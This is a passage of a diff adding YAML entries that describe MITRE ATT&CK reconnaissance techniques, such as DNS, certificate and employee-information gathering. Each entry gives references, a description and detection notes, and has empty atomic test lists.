Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
+ id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-27T02:27:31.090Z'
+ created: '2020-10-02T14:55:43.815Z'
+ x_mitre_contributors:
+ - Vinayak Wadhwa, Lucideus
+ - Lee Christensen, SpecterOps
+ - Toby Kohlenberg
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1590.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1590.002
+ url: https://attack.mitre.org/techniques/T1590/002
+ - source_name: DNS Dumpster
+ url: https://dnsdumpster.com/
+ description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
+ - source_name: Circl Passive DNS
+ url: https://www.circl.lu/services/passive-dns/
+ description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
+ Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: DNS
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
+
+ Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:02:39.701Z'
+ created: '2020-10-02T15:47:10.102Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1596.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1596.001
+ url: https://attack.mitre.org/techniques/T1596/001
+ - source_name: DNS Dumpster
+ url: https://dnsdumpster.com/
+ description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
+ - source_name: Circl Passive DNS
+ url: https://www.circl.lu/services/passive-dns/
+ description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
+ Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: DNS/Passive DNS
+ description: |-
+ Before compromising a victim, adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
+
+ Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+ id: attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:19:40.584Z'
+ created: '2020-10-02T16:57:45.044Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1591.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1591.001
+ url: https://attack.mitre.org/techniques/T1591/001
+ - source_name: ThreatPost Broadvoice Leak
+ url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
+ description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
+ Personal Voicemail Transcripts. Retrieved October 20, 2020.
+ - source_name: DOB Business Lookup
+ url: https://www.dobsearch.com/business-lookup/
+ description: Concert Technologies . (n.d.). Business Lookup - Company Name
+ Search. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Determine Physical Locations
+ description: |-
+ Before compromising a victim, adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
+
+ Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).
+ id: attack-pattern--ed730f20-0e44-48b9-85f8-0e2adeb76867
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:09:48.419Z'
+ created: '2020-10-02T16:32:33.126Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1596.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1596.003
+ url: https://attack.mitre.org/techniques/T1596/003
+ - source_name: SSLShopper Lookup
+ url: https://www.sslshopper.com/ssl-checker.html
+ description: SSL Shopper. (n.d.). SSL Checker. Retrieved October 20, 2020.
+ - source_name: Medium SSL Cert
+ url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
+ description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
+ from Server (Site URL). Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Digital Certificates
+ description: |-
+ Before compromising a victim, adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
+
+ Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+ id: attack-pattern--0979abf9-4e26-43ec-9b6e-54efc4e70fca
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:19:15.289Z'
+ created: '2020-10-02T16:58:58.738Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1590.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1590.001
+ url: https://attack.mitre.org/techniques/T1590/001
+ - source_name: WHOIS
+ url: https://www.whois.net/
+ description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
+ - source_name: DNS Dumpster
+ url: https://dnsdumpster.com/
+ description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
+ - source_name: Circl Passive DNS
+ url: https://www.circl.lu/services/passive-dns/
+ description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
+ Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Domain Properties
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).
+ id: attack-pattern--e3b168bd-fcd7-439e-9382-2e6c2f63514d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-25T22:58:22.915Z'
+ created: '2020-10-02T15:46:24.670Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1589.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1589.002
+ url: https://attack.mitre.org/techniques/T1589/002
+ - source_name: HackersArise Email
+ url: https://www.hackers-arise.com/email-scraping-and-maltego
+ description: Hackers Arise. (n.d.). Email Scraping and Maltego. Retrieved
+ October 20, 2020.
+ - source_name: CNET Leaks
+ url: https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/
+ description: Ng, A. (2019, January 17). Massive breach leaks 773 million email
+ addresses, 21 million passwords. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Email Addresses
+ description: |-
+ Before compromising a victim, adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.
+
+ Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).
+ id: attack-pattern--69f897fd-12a9-4c89-ad6a-46d2f3c38262
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T03:46:04.662Z'
+ created: '2020-10-02T14:56:24.866Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1589.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1589.003
+ url: https://attack.mitre.org/techniques/T1589/003
+ - source_name: OPM Leak
+ url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+ Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Employee Names
+ description: |-
+ Before compromising a victim, adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
+
+ Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
+ id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T03:46:29.173Z'
+ created: '2020-10-02T14:57:15.906Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1592.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1592.003
+ url: https://attack.mitre.org/techniques/T1592/003
+ - source_name: ArsTechnica Intel
+ url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
+ description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
+ source code and proprietary data dumped online. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Firmware
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
+
+ Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).
+ id: attack-pattern--b85f6ce5-81e8-4f36-aff2-3df9d02a9c9d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T03:52:36.854Z'
+ created: '2020-10-02T16:46:42.537Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1592:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1592
+ url: https://attack.mitre.org/techniques/T1592
+ - source_name: ATT ScanBox
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
+ Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Gather Victim Host Information
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T03:53:39.351Z'
+ created: '2020-10-02T16:39:33.966Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1589:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1589
+ url: https://attack.mitre.org/techniques/T1589
+ - source_name: OPM Leak
+ url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+ Retrieved October 20, 2020.
+ - source_name: Register Deloitte
+ url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
+ description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
+ Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
+ October 19, 2020.'
+ - source_name: Register Uber
+ url: https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/
+ description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
+ into court to find who hacked database of 50,000 drivers. Retrieved October
+ 19, 2020.
+ - source_name: Detectify Slack Tokens
+ url: https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/
+ description: Detectify. (2016, April 28). Slack bot token leakage exposing
+ business critical information. Retrieved October 19, 2020.
+ - source_name: Forbes GitHub Creds
+ url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+ description: Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud
+ Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
+ October 19, 2020.
+ - source_name: GitHub truffleHog
+ url: https://github.com/dxa4481/truffleHog
+ description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
+ 19, 2020.
+ - source_name: GitHub Gitrob
+ url: https://github.com/michenriksen/gitrob
+ description: 'Michael Henriksen. (2018, June 9). Gitrob: Putting the Open
+ Source in OSINT. Retrieved October 19, 2020.'
+ - source_name: CNET Leaks
+ url: https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/
+ description: Ng, A. (2019, January 17). Massive breach leaks 773 million email
+ addresses, 21 million passwords. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.
+
+ Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
+ name: Gather Victim Identity Information
+ id: attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-27T02:27:31.387Z'
+ created: '2020-10-02T14:54:59.263Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1590:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1590
+ url: https://attack.mitre.org/techniques/T1590
+ - source_name: WHOIS
+ url: https://www.whois.net/
+ description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
+ - source_name: DNS Dumpster
+ url: https://dnsdumpster.com/
+ description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
+ - source_name: Circl Passive DNS
+ url: https://www.circl.lu/services/passive-dns/
+ description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
+ Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Gather Victim Network Information
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+ id: attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-25T22:58:23.086Z'
+ created: '2020-10-02T15:45:17.628Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1591:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1591
+ url: https://attack.mitre.org/techniques/T1591
+ - source_name: ThreatPost Broadvoice Leak
+ url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
+ description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
+ Personal Voicemail Transcripts. Retrieved October 20, 2020.
+ - source_name: DOB Business Lookup
+ url: https://www.dobsearch.com/business-lookup/
+ description: Concert Technologies . (n.d.). Business Lookup - Company Name
+ Search. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Gather Victim Org Information
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
+
+ Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: DOB Business Lookup) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+ id: attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
